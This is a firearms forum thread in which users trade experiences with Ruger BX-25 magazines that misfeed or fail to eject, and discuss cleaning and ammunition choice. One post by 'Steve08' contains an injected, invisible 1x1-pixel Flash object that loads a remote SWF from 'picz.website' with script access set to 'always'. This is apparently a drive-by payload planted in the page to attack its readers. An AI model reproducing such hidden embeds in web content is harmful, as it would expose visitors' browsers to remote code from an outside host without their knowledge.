Ruger BX 25 round mag

Baroque Brass

Anyone else had problems with the BX magazines? I have two, one works pretty well, but not perfectly, but the other refuses to feed the rounds. I noticed a big difference in the ramp angle between the two mags. I contacted Ruger, they are sending another mag. At least their customer service is good.

wareagle700

I think I've got two, no issues that I can remember.

Red350SS

Anyone else had problems with the BX magazines? I have two, one works pretty well, but not perfectly, but the other refuses to feed the rounds. I noticed a big difference in the ramp angle between the two mags. I contacted Ruger, they are sending another mag. At least their customer service is good.

Never had any issues.....but have heard of issues, so i keep mine clean. I have always heard they dont do well if they are dirty. Nothing peeses me off worse than a malfuctioning magazine....

Baroque Brass

New one should arrive from Ruger in a few days. I'll try it out - dang it, hate when I have to go shoot - and report back.

Baroque Brass

Ran 25 rounds through new mag today. It was better but I still had several misfeeds, failure to eject, etc. Between two BX 25 mags I've yet to be able to fire all 25 rounds without a problem.

Red350SS

Ran 25 rounds through new mag today. It was better but I still had several misfeeds, failure to eject, etc. Between two BX 25 mags I've yet to be able to fire all 25 rounds without a problem.

10/22? Clean the rifle.....good. They can get temperamental...and everyone I have shot is picky about ammo....they dont like bulk ammo has been my experience

Steve08

Anyone else had problems with the BX magazines? I have two, one works pretty well, but not perfectly, but the other refuses to feed the rounds. I noticed a big difference in the ramp angle between the two mags. I contacted Ruger, they are sending another mag. At least their customer service is good.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
I got 2 and no problems at all...

ClemsonRangers

i have a failure to eject on occasion, but it isnt the mag's fault, mag seems to feed fine